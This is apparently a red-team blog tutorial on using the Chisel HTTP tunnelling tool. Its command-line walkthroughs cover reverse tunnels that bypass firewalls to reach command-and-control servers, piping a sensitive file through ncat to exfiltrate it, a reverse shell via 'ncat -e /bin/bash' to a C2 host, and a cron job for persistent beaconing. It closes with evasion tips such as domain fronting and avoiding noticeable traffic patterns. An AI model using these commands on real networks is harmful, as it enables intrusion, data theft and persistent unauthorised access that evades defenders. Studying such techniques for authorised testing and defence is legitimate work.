Hey there, fellow hackers and pen testers! If you’re reading this article, you’re probably passionate about staying ahead in the game and mastering the tools that help us win big in cybersecurity. Today, I’ll be walking you through a powerful technique I’ve used in many red team engagements—tunneling traffic using Chisel, a lightweight tool that leverages HTTP to move SSH traffic across restricted networks.
Chisel is a fast, reliable, and versatile tool that can help us bypass firewalls, intrusion detection systems, and other security measures by tunneling our traffic over HTTP. It’s an invaluable resource when you’re on a red team engagement or just exploring the boundaries of a network.
In this article, we’ll explore the world of Chisel, its functionality, setup, and use cases. I’ll provide plenty of examples and code snippets along the way, and by the end of this article, you’ll be a Chisel expert, ready to tunnel your way to victory!
So, let’s dive in!
Understanding Chisel
Chisel is a powerful open-source tool for creating secure, encrypted tunnels between two systems. Developed by jpillora, Chisel is written in Go, making it easily portable across different platforms. At its core, Chisel is an SSH client and server that speaks HTTP, allowing it to traverse firewalls and security devices typically configured to allow HTTP traffic.
One of Chisel’s greatest strengths is its versatility. It supports forward and reverse tunnels and SOCKS5 proxying and can be easily combined with other tools like Metasploit, Cobalt Strike, and even custom payloads.
Before we delve into the installation and setup process, it’s essential to understand the main components of Chisel:
- Chisel Server: The server component listens for incoming client connections and sets up tunnels based on the client’s requests. The server can be hosted on any system with a public IP address or a domain, making it ideal for use with cloud infrastructure providers like AWS, GCP, or Azure.
- Chisel Client: The client component connects to the Chisel server and requests specific tunnels to be set up. The client can be run on any system, including the target machine, your local machine, or a system within the target network.
With these components in mind, let’s install and set up Chisel.
Chisel Installation and Setup
To install Chisel, visit the GitHub repository (https://github.com/jpillora/chisel) and download the latest binary release for your operating system. Chisel is available for Linux, macOS, and Windows.
After downloading the binary, make it executable by running the following command:
chmod +x chisel
Now, you should be able to run the Chisel binary by simply executing:
./chisel
Chisel Use Cases
Let’s look at four common ways Chisel can help in real-world red team scenarios:
Bypassing Firewall Restrictions
One of the most common use cases for Chisel is bypassing firewall restrictions. This can be helpful when a target network has strict outbound rules that prevent you from establishing connections to your command and control (C2) infrastructure. You can bypass these restrictions and maintain control of compromised systems by tunneling traffic through an allowed protocol like HTTP.
To bypass firewall restrictions with Chisel, first, set up the Chisel server on a publicly accessible system. Run the following command on the server:
./chisel server -p 8080 --reverse
Next, run the Chisel client on the target machine. The client will connect to the Chisel server and request a reverse tunnel:
./chisel client http://<server-ip>:8080 R:2222:localhost:22
Now, you can SSH into the target machine through the Chisel server:
ssh -p 2222 user@<server-ip>
Remote Port Forwarding
To use Chisel for remote port forwarding, first start the Chisel server:
./chisel server -p 8080
Next, on the target machine, run the Chisel client:
./chisel client http://<server-ip>:8080 8081:localhost:80
Now, access the target’s HTTP service:
curl http://<server-ip>:8081
Reverse Port Forwarding
To set up reverse port forwarding, run:
./chisel server -p 8080 --reverse
And on your local machine:
./chisel client http://<server-ip>:8080 R:8081:localhost:80
This lets systems on the target network access your local HTTP service:
curl http://localhost:8081
SOCKS Proxy
To use Chisel as a SOCKS5 proxy:
./chisel server -p 8080
Then on the target machine:
./chisel client http://<server-ip>:8080 --socks5
The SOCKS5 proxy will typically listen on localhost:1080 by default—note this in the client’s output.
On your local machine, install and configure proxychains:
sudo apt-get install proxychains
Edit /etc/proxychains.conf and add:
socks5 <server-ip> <socks5-port>
Then:
proxychains curl http://internal-website.local
Real-World Examples
Exfiltrating Data from a Restricted Network
Start the Chisel server:
./chisel server -p 8080 --reverse
On the target:
./chisel client http://<c2-ip>:8080 R:4444:localhost:4444
Then:
cat sensitive-data.txt | ncat -l -p 4444
On your C2 server:
ncat -v <c2-ip> 4444 > exfiltrated-data.txt
Gaining Access to an Internal Web Application
Server:
./chisel server -p 8080
Client:
./chisel client http://<server-ip>:8080 8081:internal-webapp.local:80
Access the app:
curl http://<server-ip>:8081
Establishing a Chisel Beacon for Persistent C2 Communication
Server:
./chisel server -p 8080 --reverse
Client:
./chisel client http://<c2-ip>:8080 R:8888:localhost:8888 --keepalive 5m
Server listener:
ncat -l -p 8888
Target command execution:
ncat -e /bin/bash <c2-ip> 8888
Periodic Chisel Beacon with Cron
Server:
./chisel server -p 8080 --reverse
Client cron job:
./chisel client http://<c2-ip>:8080 --reverse --timeout 30s
Crontab:
*/5 * * * * /path/to/chisel client http://<c2-ip>:8080 --reverse --timeout 30s >/dev/null 2>&1
Optional SOCKS proxy on server:
./chisel server -p 8080 --reverse --socks5
Tips and Tricks for Advanced Chisel Usage
- Combine Chisel with Metasploit, Cobalt Strike, or custom payloads.
- Use domain fronting for stealth via CDNs like Cloudflare.
- Add authentication with
--auth user:passto prevent misuse. - Use stunnel to wrap Chisel in TLS for added encryption.
- Watch for traffic patterns—avoid large data spikes or weird hours.
Conclusion
Chisel is a stealthy, lightweight, and versatile tunneling tool perfect for red team operations. Its ability to bypass firewall restrictions, forward and reverse ports, and create SOCKS proxies makes it an invaluable asset for offensive security work.
In this article, we covered Chisel installation, practical use cases, real-world scenarios, and advanced usage tips. Now that you’ve got Chisel in your toolbox, try setting up a lab and practicing these techniques in a safe environment!
Remember—use this knowledge ethically and legally. Stay sharp, and happy hacking!